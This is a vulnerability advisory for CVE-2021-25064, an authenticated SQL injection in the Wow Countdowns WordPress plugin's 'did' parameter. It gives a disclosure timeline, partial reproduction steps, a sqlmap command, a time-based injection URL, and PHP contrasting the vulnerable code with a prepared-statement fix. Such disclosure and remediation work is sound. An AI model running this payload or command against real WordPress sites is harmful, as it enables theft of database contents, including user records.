Dec 10, 2021: Issue Identified and Disclosed to Wpscan (#5662), Got auto reply
Dec 14th, 2021: Got update that vendor had been contacted, CVE Assigned CVE-2021-25064
Dec 15th, 2021: Plugin version updated
Dec 22nd, 2021: CVE Assigned CVE-2021-25064
January 18, 2022: Plugin closed
March 28, 2022: CVE Published in NVD
The Wow Countdowns plugin does not sanitize user input into the 'did' parameter and uses it in a SQL statement, leading to an authenticated SQL Injection
We can see the problematic code in \admin\partials\main.php
This vulnerability is present in the current version of the plugin 3.1.1. Administrative access is required to access the vulnerable functionality.
Link to plugin:
Steps to reproduce:
4. Click the delete link, then capture and save the request in an intercepting proxy.
5. Save the request to a file, request.txt
6. Run sqlmap
sqlmap -r request.txt --dbms=mysql --current-user -p did --batch --flush-session
https://test0.local/wp-admin/admin.php?page=mwp-countdown&info=del&did=1 AND (SELECT 5382 FROM SELECT(SLEEP(5)))PpNt)
Using this technique, we can dump the entire contents of the database, including WordPress users and so on.
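The root cause is the unsanitized 'did' value being placed directly into a SQL statement. The following is an added illustration of that pattern next to the hardened form a plugin author would ship; it is not the Wow Countdowns plugin's own code, and the table name, function names and nonce action are assumptions.

```php
<?php
// Added illustration, not the plugin's own code.
// Table name, function names and nonce action are assumptions.

// Vulnerable pattern (as described in the advisory): the 'did' request
// parameter is concatenated directly into the DELETE statement.
function mwp_delete_countdown_vulnerable() {
    global $wpdb;
    $table = $wpdb->prefix . 'mwp_countdowns'; // assumed table name
    $did   = $_GET['did'];                     // untrusted, unsanitized
    $wpdb->query( "DELETE FROM $table WHERE id = $did" ); // SQL injection
}

// Hardened form: gate the action behind a capability check and a nonce,
// cast the id to a positive integer, and bind it through $wpdb->prepare().
function mwp_delete_countdown_hardened() {
    global $wpdb;

    // Only administrators may delete, and only from a link that carried a nonce.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    check_admin_referer( 'mwp_delete_countdown' ); // assumed nonce action

    $did = isset( $_GET['did'] ) ? absint( $_GET['did'] ) : 0;
    if ( 0 === $did ) {
        wp_die( 'Invalid countdown id.' );
    }

    $table = $wpdb->prefix . 'mwp_countdowns'; // assumed table name
    // %d forces integer substitution; the value can no longer alter the query.
    $wpdb->query( $wpdb->prepare( "DELETE FROM {$table} WHERE id = %d", $did ) );
}
```

Even with administrative access required, the prepared statement and nonce check remove both the injection and the CSRF path to the delete action.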